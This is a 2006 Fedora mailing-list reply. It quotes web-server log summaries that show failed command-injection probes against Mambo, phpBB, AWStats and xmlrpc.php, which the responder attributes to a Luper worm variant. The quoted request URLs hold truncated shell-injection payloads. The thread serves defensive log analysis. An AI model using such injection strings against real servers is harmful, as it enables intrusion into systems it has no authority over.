Security question regarding root email

Peter Gordon admin at ramshacklestudios.com
Sun Jan 1 20:33:07 UTC 2006 

On Sun, 2006-01-01 at 15:37 +0200, Dotan Cohen wrote:
>  --------------------- httpd Begin ------------------------
>  Requests with error response codes
>     404 Not Found
>        /cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
>        /cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>        /favicon.ico: 32 Time(s)
>        /javascript/HM_Arrays.js: 1 Time(s)
>        /javascript/HM_ScriptDOM.js: 1 Time(s)
>        /mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
>        /php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>  ---------------------- httpd End -------------------------
> [...]
>  --------------------- httpd Begin ------------------------
>  Requests with error response codes
>     403 Forbidden
>        /cgi-bin/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
>        /cgi-bin/awstats/awstats.pl?configdir=|ech ... cho%20YYY;echo|: 1 Time(s)
>     404 Not Found
>        /Forums/admin/admin_styles.php?phpbb_root_ ... cho%20YYY;echo|: 1 Time(s)
>        /Forums/admin/admin_styles.phpadmin_styles ... cho%20YYY;echo|: 1 Time(s)
>        /admin_styles.phpadmin_styles.php?phpbb_ro ... cho%20YYY;echo|: 1 Time(s)
>        /awstats/awstats.pl?configdir=|echo;echo%2 ... cho%20YYY;echo|: 1 Time(s)
>        /blog/xmlrpc.php: 2 Time(s)
>        /blog/xmlsrv/xmlrpc.php: 2 Time(s)
>        /blogs/xmlsrv/xmlrpc.php: 2 Time(s)
>        /cvs/index2.php?_REQUEST[option]=com_conte ... cho%20YYY;echo|: 1 Time(s)
>        /cvs/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>        /drupal/xmlrpc.php: 2 Time(s)
>        /mambo/index2.php?_REQUEST[option]=com_con ... cho%20YYY;echo|: 1 Time(s)
>        /modules/Forums/admin/admin_styles.php?php ... cho%20YYY;echo|: 1 Time(s)
>        /modules/Forums/admin/admin_styles.phpadmi ... cho%20YYY;echo|: 2 Time(s)
>        /modules/coppermine/themes/default/theme.p ... cho%20YYY;echo|: 2 Time(s)
>        /php/mambo/index2.php?_REQUEST[option]=com ... cho%20YYY;echo|: 1 Time(s)
>        /phpgroupware/xmlrpc.php: 2 Time(s)
>        /wordpress/xmlrpc.php: 2 Time(s)
>        /xmlrpc.php: 4 Time(s)
>        /xmlrpc/xmlrpc.php: 2 Time(s)
>        /xmlsrv/xmlrpc.php: 2 Time(s)
>  ---------------------- httpd End -------------------------
As I recall, these are attempts to hijack your server using a variant of
the Luper worm that was going around a few months back. You seem to be
running SELinux though, so you probably shouldn't be worried, as the
default targeted and strict policies of Fedora Core 3 and 4 protect
against it.  :-)
-- 
Peter Gordon (codergeek42)
GnuPG Public Key: 0xDA3634D7
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 189 bytes
Desc: This is a digitally signed message part
URL: <http://listman.redhat.com/archives/fedora-list/attachments/20060101/dca26b9a/attachment-0001.sig>

More information about the fedora-list mailing list